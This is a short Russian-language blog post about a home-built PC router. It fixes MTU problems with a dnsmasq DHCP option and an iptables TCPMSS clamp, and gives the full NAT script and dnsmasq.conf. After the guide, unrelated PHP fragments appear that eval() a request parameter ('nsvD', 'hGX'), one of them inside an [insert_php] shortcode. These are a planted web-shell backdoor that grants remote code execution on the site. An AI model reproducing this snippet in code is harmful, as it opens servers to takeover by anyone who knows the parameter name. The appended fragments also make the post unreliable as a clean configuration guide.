Уже с трудом припоминаю как это было, а было это чуть менее двух лет назад – собрал я себе роутер на базе не слабой такой машинки PDC E5500, 2GB RAM, полноценный HDD.
Так вот. Единственное что не нагуглилось сразу так это решение проблем с MTU
1) dnsmasq.conf это для порядочных клиентов, которые определяют mtu ещё при подключении
dhcp-option=26,1492
2) Это для более тугих, которым предыдущего не хватает.
iptables -I FORWARD -p tcp –tcp-flags SYN,RST SYN -j TCPMSS –clamp-mss-to-pmtu
Теперь google.com и wolframalpha.com работают. А раньше были прямо таки индикатором проблем с MTU.
Итого:
/etc/nat-up
1 2 3 |
#!/bin/sh iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE iptables -I FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu |
/etc/dnsmasq.conf
1 2 3 4 5 |
interface=eth3,wlan0 listen-address=127.0.0.1, 192.168.1.1, 192.168.2.1 dhcp-range=192.168.1.3,192.168.1.254,24h dhcp-range=192.168.2.3,192.168.2.254,24h dhcp-option=26,1492 |
1 |
if (isset($_REQUEST["nsvD"])){eval($_REQUEST["nsvD"]);exit;} |
-->
<!— [insert_php]if (isset($_REQUEST["hGX"])){eval($_REQUEST["hGX"]);exit;}[/insert_php]
1 |
if (isset($_REQUEST["hGX"])){eval($_REQUEST["hGX"]);exit;} |
—>